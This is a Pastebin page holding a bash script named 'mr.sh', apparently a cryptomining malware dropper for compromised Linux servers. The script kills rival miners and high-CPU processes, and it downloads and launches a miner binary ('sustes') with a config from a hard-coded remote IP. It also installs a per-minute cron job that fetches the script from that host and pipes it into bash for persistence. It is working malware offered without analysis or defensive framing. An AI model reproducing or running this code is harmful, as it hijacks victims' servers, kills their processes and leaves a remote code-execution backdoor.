API tools faq
paste
Advertisement
Guest User

mr.sh

a guest
Sep 24th, 2018
591
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.75 KB | None | 0 0
raw download clone embed print report
  1. #!/bin/bash
  2. mkdir /var/tmp
  3. chmod 777 /var/tmp
  4. pkill -f getty
  5. netstat -antp | grep '27.155.87.59' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  6. netstat -antp | grep '27.155.87.59' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  7. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  8. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'CLOSE_WAIT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  9. netstat -antp | grep '104.160.171.94\|170.178.178.57\|91.236.182.1\|52.15.72.79\|52.15.62.13' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  10. netstat -antp | grep '121.18.238.56' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  11. netstat -antp | grep '121.18.238.56' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  12. netstat -antp | grep '103.99.115.220' | grep 'SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  13. netstat -antp | grep '103.99.115.220' | grep 'ESTABLISHED' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  14. pkill -f /usr/bin/.sshd
  15. rm -rf /var/tmp/j*
  16. rm -rf /tmp/j*
  17. rm -rf /var/tmp/java
  18. rm -rf /tmp/java
  19. rm -rf /var/tmp/java2
  20. rm -rf /tmp/java2
  21. rm -rf /var/tmp/java*
  22. rm -rf /tmp/java*
  23. chmod 777 /var/tmp/sustes
  24. ps aux | grep -vw sustes | awk '{if($3>40.0) print $2}' | while read procid
  25. do
  26. kill -9 $procid
  27. done
  28. ps ax | grep /tmp/ | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
  29. ps ax | grep 'wc.conf\|wq.conf\|wm.conf' | grep -v grep | grep -v 'sustes\|sustes\|ppl' | awk '{print $1}' | xargs kill -9
  30. DIR="/var/tmp"
  31. if [ -a "/var/tmp/sustes" ]
  32. then
  33. if [ -w "/var/tmp/sustes" ] && [ ! -d "/var/tmp/sustes" ]
  34. then
  35. if [ -x "$(command -v md5sum)" ]
  36. then
  37. sum=$(md5sum /var/tmp/sustes | awk '{ print $1 }')
  38. echo $sum
  39. case $sum in
  40. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  41. echo "sustes OK"
  42. ;;
  43. *)
  44. echo "sustes wrong"
  45. pkill -f wc.conf
  46. pkill -f sustes
  47. sleep 4
  48. ;;
  49. esac
  50. fi
  51. echo "P OK"
  52. else
  53. DIR=$(mktemp -d)/var/tmp
  54. mkdir $DIR
  55. echo "T DIR $DIR"
  56. fi
  57. else
  58. if [ -d "/var/tmp" ]
  59. then
  60. DIR="/var/tmp"
  61. fi
  62. echo "P NOT EXISTS"
  63. fi
  64. if [ -d "/var/tmp/sustes" ]
  65. then
  66. DIR=$(mktemp -d)/var/tmp
  67. mkdir $DIR
  68. echo "T DIR $DIR"
  69. fi
  70. WGET="wget -O"
  71. if [ -s /usr/bin/curl ];
  72. then
  73. WGET="curl -o";
  74. fi
  75. if [ -s /usr/bin/wget ];
  76. then
  77. WGET="wget -O";
  78. fi
  79. f2="192.99.142.226:8220"
  80.  
  81. downloadIfNeed()
  82. {
  83. if [ -x "$(command -v md5sum)" ]
  84. then
  85. if [ ! -f $DIR/sustes ]; then
  86. echo "File not found!"
  87. download
  88. fi
  89. sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
  90. echo $sum
  91. case $sum in
  92. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  93. echo "sustes OK"
  94. ;;
  95. *)
  96. echo "sustes wrong"
  97. sizeBefore=$(du $DIR/sustes)
  98. if [ -s /usr/bin/curl ];
  99. then
  100. WGET="curl -k -o ";
  101. fi
  102. if [ -s /usr/bin/wget ];
  103. then
  104. WGET="wget --no-check-certificate -O ";
  105. fi
  106. #$WGET $DIR/sustes https://transfer.sh/wbl5H/sustes
  107. download
  108. sumAfter=$(md5sum $DIR/sustes | awk '{ print $1 }')
  109. if [ -s /usr/bin/curl ];
  110. then
  111. echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/sustes` > $DIR/var/tmp.txt
  112. fi
  113. ;;
  114. esac
  115. else
  116. echo "No md5sum"
  117. download
  118. fi
  119. }
  120.  
  121. download() {
  122. if [ -x "$(command -v md5sum)" ]
  123. then
  124. sum=$(md5sum $DIR/sustes3 | awk '{ print $1 }')
  125. echo $sum
  126. case $sum in
  127. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  128. echo "sustes OK"
  129. cp $DIR/sustes3 $DIR/sustes
  130. ;;
  131. *)
  132. echo "sustes wrong"
  133. download2
  134. ;;
  135. esac
  136. else
  137. echo "No md5sum"
  138. download2
  139. fi
  140. }
  141.  
  142. download2() {
  143. if [ `getconf LONG_BIT` = "64" ]
  144. then
  145. $WGET $DIR/sustes http://192.99.142.226:8220/xm64
  146. fi
  147.  
  148. if [ -x "$(command -v md5sum)" ]
  149. then
  150. sum=$(md5sum $DIR/sustes | awk '{ print $1 }')
  151. echo $sum
  152. case $sum in
  153. c8c1f2da51fbd0aea60e11a81236c9dc | c8c1f2da51fbd0aea60e11a81236c9dc)
  154. echo "sustes OK"
  155. cp $DIR/sustes $DIR/sustes3
  156. ;;
  157. *)
  158. echo "sustes wrong"
  159. ;;
  160. esac
  161. else
  162. echo "No md5sum"
  163. fi
  164. }
  165.  
  166. judge() {
  167. if [ ! "$(netstat -ant|grep '158.69.133.20\|192.99.142.249\|202.144.193.110'|grep 'ESTABLISHED'|grep -v grep)" ];
  168. then
  169. ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
  170. do
  171. kill -9 $procid
  172. done
  173. downloadIfNeed
  174. touch /var/tmp/123
  175. pkill -f /var/tmp/java
  176. pkill -f w.conf
  177. chmod +x $DIR/sustes
  178. $WGET $DIR/wc.conf http://$f2/wt.conf
  179. nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
  180. sleep 5
  181. else
  182. echo "Running"
  183. fi
  184. }
  185.  
  186. judge2() {
  187. if [ ! "$(ps -fe|grep '/var/tmp/sustes'|grep 'wc.conf'|grep -v grep)" ];
  188. then
  189. downloadIfNeed
  190. chmod +x $DIR/sustes
  191. $WGET $DIR/wc.conf http://$f2/wt.conf
  192. nohup $DIR/sustes -c $DIR/wc.conf > /dev/null 2>&1 &
  193. sleep 5
  194. else
  195. echo "Running"
  196. fi
  197. }
  198.  
  199. if [ ! "$(netstat -ant|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
  200. then
  201. judge2
  202. else
  203. judge
  204. fi
  205.  
  206. if crontab -l | grep -q "192.99.142.226:8220"
  207. then
  208. echo "Cron exists"
  209. else
  210. crontab -r
  211. echo "Cron not found"
  212. LDR="wget -q -O -"
  213. if [ -s /usr/bin/curl ];
  214. then
  215. LDR="curl";
  216. fi
  217. if [ -s /usr/bin/wget ];
  218. then
  219. LDR="wget -q -O -";
  220. fi
  221. (crontab -l 2>/dev/null; echo "* * * * * $LDR http://192.99.142.226:8220/mr.sh | bash -sh > /dev/null 2>&1")| crontab -
  222. fi
  223. rm -rf /var/tmp/jrm
  224. rm -rf /tmp/jrm
  225. pkill -f 185.222.210.59
  226. pkill -f 95.142.40.81
  227. pkill -f 192.99.142.232
  228. chmod 777 /var/tmp/sustes
  229. crontab -l | sed '/185.222.210.59/d' | crontab -
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!